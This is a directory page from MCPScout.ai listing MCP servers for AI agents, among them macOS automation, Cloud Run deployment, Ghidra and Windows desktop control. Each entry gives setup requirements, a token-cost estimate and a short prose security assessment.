Stop Searching. Start Trusting.

The curated directory of MCP servers, vetted for security, efficiency, and quality.

Tired of the MCP "Marketplace" Chaos?

We built MCPScout.ai to solve the ecosystems biggest pain points.

No Insecure Dumps

We manually analyze every server for basic security flaws.

Easy Setup

Our gotcha notes warn you about complex setups.

Avoid "Token Hogs"

We estimate token costs for cost-effective agents.

Products, Not Demos

We filter out "Hello World" demos.

SORT:

Vetted Servers(7632)

97
498
Medium Cost
Sec7

Transforms an AI assistant into a macOS automation agent, allowing it to execute AppleScript and JavaScript for Automation (JXA) commands to control applications and system functions.

Setup Requirements

  • ⚠️Requires macOS as the operating system.
  • ⚠️Requires explicit user-granted macOS Automation and Accessibility permissions for the application running the server (e.g., Terminal, Node.js).
  • ⚠️Requires Node.js version >= 18.0.0.
Review RequiredView Analysis
The server's core functionality involves executing arbitrary AppleScript/JXA code, either directly provided by the client or sourced from its knowledge base, via `osascript`. This grants high privileges to the executing AI, including the ability to run shell commands (`do shell script`) and interact with the file system and other applications. While placeholder substitution includes escaping, it cannot mitigate malicious logic within the scripts themselves. Network requests can be made from JXA scripts via the Objective-C bridge, potentially exposing data or fetching malicious content. The README explicitly highlights the critical need for user-granted macOS Automation and Accessibility permissions, indicating a high-trust environment is required. If the AI agent itself is compromised or unconstrained, it could pose significant risks.
Updated: 2025-12-02GitHub
97
412
Low Cost
whillhill icon

mcpstore

by whillhill

Sec7

MCPStore acts as an orchestration layer for managing Microservice Context Protocol (MCP) services and adapting them as tools for AI frameworks like LangChain, AutoGen, and others.

Setup Requirements

  • ⚠️Requires `fastmcp` to be installed (e.g., `pip install fastmcp`).
  • ⚠️Specific AI framework adapters (e.g., LangChain) require additional optional dependencies (e.g., `pip install mcpstore[langchain]`).
  • ⚠️For Redis backend, a running Redis instance is required.
Verified SafeView Analysis
Default FastAPI CORS `allow_origins=["*"]` should be restricted in production environments. Redis sensitive configuration (URL, password) is not loaded from environment variables by default, which could lead to accidental hardcoding in user code if not managed carefully. Hub services run in subprocesses and expose HTTP endpoints; proper authentication and network isolation are responsibilities of the deployer.
Updated: 2025-12-05GitHub
97
503
Medium Cost

Integrates LINE Messaging API with AI Agents to enable automated communication and rich menu management for LINE Official Accounts.

Setup Requirements

  • ⚠️Requires Node.js v20+ (or a Docker environment with Chromium dependencies for image generation).
  • ⚠️Requires a LINE Official Account with Messaging API enabled and a Channel Access Token.
  • ⚠️DESTINATION_USER_ID is optional but required if `userId` is not provided for messaging tools.
Verified SafeView Analysis
The server correctly uses environment variables for sensitive tokens. However, the `create_rich_menu` tool utilizes Puppeteer with the `--no-sandbox` argument to render rich menu images, where user-provided `chatBarText` and action `label` fields are embedded into an HTML template. While input validation (Zod) is present for general structure, if malicious HTML/JavaScript is injected into these text fields and not sufficiently sanitized by the Marp rendering process, it could potentially be executed within the unsandboxed Puppeteer instance, posing a security risk. This is noted as a preview version, suggesting it may not be production-hardened.
Updated: 2025-12-10GitHub
97
483
Medium Cost
GoogleCloudPlatform icon

cloud-run-mcp

by GoogleCloudPlatform

Sec9

Enables MCP-compatible AI agents to deploy applications to Google Cloud Run, facilitating automated code deployment from various AI-powered development tools.

Setup Requirements

  • ⚠️Requires Google Cloud SDK installation and authentication (gcloud auth login, gcloud auth application-default login).
  • ⚠️Requires an active Google Cloud account with billing enabled.
  • ⚠️For local execution, Node.js (LTS version) or Docker must be installed.
Verified SafeView Analysis
The server leverages official Google Cloud SDKs and services like Cloud Build and Artifact Registry for secure deployment pipelines. It includes mechanisms for DNS rebinding protection (ENABLE_HOST_VALIDATION, ALLOWED_HOSTS), although these are disabled by default. The SKIP_IAM_CHECK variable, defaulting to 'true', makes deployed Cloud Run services publicly accessible, which is a common configuration but requires awareness from the user regarding the security of their deployed application. There are no obvious signs of 'eval', obfuscation, or unsanitized shell command execution. Authentication relies on Google Cloud Application Default Credentials, which promotes secure credential handling.
Updated: 2025-12-11GitHub
97
460
Medium Cost
Sec6

Provides Next.js development tools and utilities for coding agents to assist with debugging, upgrades, documentation, and browser automation.

Setup Requirements

  • ⚠️Requires Node.js v20.9+.
  • ⚠️Requires a clean Git working directory before running codemods for Next.js upgrades.
  • ⚠️Monorepo users must run the upgrade workflow on each individual Next.js app directory, not at the monorepo root.
Verified SafeView Analysis
The 'browser_eval' tool includes an 'evaluate' action which can execute arbitrary JavaScript in a browser context. While this is within a sandboxed browser, it grants significant code execution capabilities to the AI agent, posing a risk if the agent is compromised to execute malicious scripts. The tool also interacts with local Next.js development servers, which is intended behavior but could be a vector for a compromised agent.
Updated: 2025-12-12GitHub
96
348
Medium Cost
jtang613 icon

GhidrAssistMCP

by jtang613

Sec7

Enables AI assistants and other tools to interact with Ghidra's reverse engineering capabilities through a standardized Model Context Protocol (MCP) API.

Setup Requirements

  • ⚠️Requires Ghidra 11.4+ (specific version constraint)
  • ⚠️Requires an MCP client to interact (e.g., GhidrAssist) as it's an API server, not a standalone application
  • ⚠️Server operates on port 8080 by default; ensure port availability or configure otherwise in Ghidra's UI
Verified SafeView Analysis
The server binds to a configurable host and port (defaulting to localhost:8080). While running on localhost is relatively safe, if configured to bind to 0.0.0.0 or another external IP, it exposes Ghidra's powerful modification APIs (e.g., renaming functions, setting data types, creating structures from C definitions) to any client with network access without authentication or authorization. This design decision prioritizes ease of integration for AI clients over network-level security. Users must ensure proper network isolation if exposing the server.
Updated: 2025-11-29GitHub
96
371
Medium Cost
Sec8

A TypeScript SDK for building multi-provider AI agents that chain LLM reasoning with external tools and orchestrate multi-agent workflows.

Setup Requirements

  • ⚠️Requires API keys for LLM providers (e.g., OpenAI, Anthropic, Mistral), which are often paid services.
  • ⚠️Requires external MCP (Multi-Provider Component) servers to be running for tool integration, as demonstrated in the 'Hello World' example (e.g., 'http://localhost:8001/mcp').
  • ⚠️Requires a Node.js/TypeScript development environment.
Verified SafeView Analysis
The SDK relies on environment variables for API keys, which is a good practice. It connects to various external LLM providers and can connect to user-defined MCP server URLs. While the SDK itself doesn't show obvious vulnerabilities like 'eval' or obfuscation, the overall security depends on the secure management of API keys, the trustworthiness of the connected LLM providers, and the security of any custom MCP servers integrated.
Updated: 2025-11-18GitHub
96
339
High Cost
jina-ai icon

MCP

by jina-ai

Sec9

A remote Model Context Protocol (MCP) server that provides access to Jina AI's Reader, Embeddings, and Reranker APIs with a suite of URL-to-markdown, web search, image search, and semantic deduplication/reranking tools for LLMs.

Setup Requirements

  • ⚠️Requires a Jina AI API Key for most tools and to bypass rate limits on 'optional' tools (a free key is available, but usage may be charged for paid tiers).
  • ⚠️The server is explicitly designed for deployment on Cloudflare Workers, necessitating a Cloudflare account and use of the Wrangler CLI for deployment.
  • ⚠️Specific client-side JSON configuration is required for various LLM clients (e.g., LM Studio, Claude Code, OpenAI Codex, Cursor) to correctly integrate the MCP server, often including API key injection.
Verified SafeView Analysis
No direct use of 'eval' or other obviously dangerous dynamic code execution functions found. External API calls to Jina AI services require a Jina AI API key, handled via `Authorization` header or environment variables. The `show_api_key` tool is noted as a debug feature for the client to retrieve its own bearer token. The server is designed for deployment on Cloudflare Workers, benefiting from its secure serverless execution environment. URL normalization and HTML parsing for datetime guessing are implemented with reasonable care. Overall, the security posture is strong, relying primarily on the security of upstream Jina AI APIs and proper API key management by the user.
Updated: 2025-12-13GitHub
96
352
High Cost
archestra-ai icon

archestra

by archestra-ai

Sec9

A centralized AI platform that orchestrates Model Context Protocol (MCP) servers, providing security, cost management, and observability for LLM interactions and tool usage.

Setup Requirements

  • ⚠️Requires Docker or Kubernetes for deployment.
  • ⚠️Requires a PostgreSQL database for persistent storage.
  • ⚠️Integration with LLM providers (e.g., OpenAI, Anthropic, Google Gemini) requires their respective API keys, which are often paid services.
Verified SafeView Analysis
The platform demonstrates a strong focus on security, actively implementing features to mitigate common LLM-related risks such as prompt injections and data exfiltration (e.g., Dual LLM, Trusted Data Policies, Tool Invocation Policies). It uses non-root containers and integrates with secret managers (like Vault) for sensitive data. Minor use of `node -e` is limited to test scripts and does not appear in production paths.
Updated: 2025-12-14GitHub
95
218
Low Cost
Sec7

Automate Power BI semantic model development and management using AI agents via the MCP protocol.

Setup Requirements

  • ⚠️Requires Visual Studio Code
  • ⚠️Requires GitHub Copilot and GitHub Copilot Chat extensions (Paid subscription may be required)
  • ⚠️Requires connection to an existing Power BI semantic model (Desktop, Fabric, or PBIP files)
Verified SafeView Analysis
The project explicitly warns about the risks of connecting AI agents to semantic models, including unintended changes, exposure of sensitive information, and the need for backups. It highlights that autonomous or misconfigured clients may perform destructive actions and recommends applying least-privilege RBAC roles. Credentials are handled securely via the Azure Identity SDK, and no 'eval', obfuscation, or hardcoded secrets were identified in the provided truncated code. The security documentation emphasizes Microsoft security guidance for MCP servers.
Updated: 2025-12-04GitHub
95
258
Low Cost

This server enables LLM agents to execute Python code in a highly secure, isolated container environment, facilitating complex multi-tool orchestration and data analysis with minimal LLM context token usage.

Setup Requirements

  • ⚠️Requires Podman or Docker (rootless configuration is the default and recommended).
  • ⚠️Requires Python 3.11+ (Python 3.14-slim is the default container image).
  • ⚠️Requires `uv` or `pip` for dependency management (`uv` recommended for installation).
  • ⚠️Pydantic >= 2.12.0 is needed for Python 3.14+ to avoid `TypeError: _eval_type() got an unexpected keyword argument 'prefer_fwd_module'`.
Verified SafeView Analysis
The server executes user-provided Python code using `eval(compile(code, ...), ...)` within a highly restricted, rootless container sandbox. This sandbox enforces strict isolation: no network, read-only rootfs, all capabilities dropped, no new privileges, unprivileged user (65534:65534), and resource limits (memory, PIDs, CPU, timeout). All MCP traffic is mediated by the host, providing an audit trail and preventing direct access to the host or external networks. While `eval` is used, it is the core function of the isolated sandbox, not a direct vulnerability in this hardened setup. The project's history explicitly details lessons from failed insecure prototypes, indicating a strong architectural commitment to security.
Updated: 2025-12-05GitHub
95
223
Medium Cost
AIDotNet icon

Windows-MCP.Net

by AIDotNet

Sec3

Enabling AI assistants to automate tasks and interact with the Windows desktop environment.

Setup Requirements

  • ⚠️Requires Windows Operating System
  • ⚠️Requires .NET 10.0 Runtime or higher
  • ⚠️Requires appropriate Windows administrative permissions to perform desktop automation operations
Review RequiredView Analysis
The server grants broad access to Windows desktop operations, including PowerShell execution, file system manipulation, and UI control. While intended for AI automation, this poses significant security risks if the AI agent or server itself is compromised or misused, potentially leading to data loss, system compromise, or unauthorized actions. There is no visible sandboxing or fine-grained permission control for AI actions described, and the tool requires appropriate Windows permissions (potentially administrative) to function, making it a high-risk component if its inputs are not strictly controlled.
Updated: 2025-11-27GitHub
PreviousPage 13 of 636Next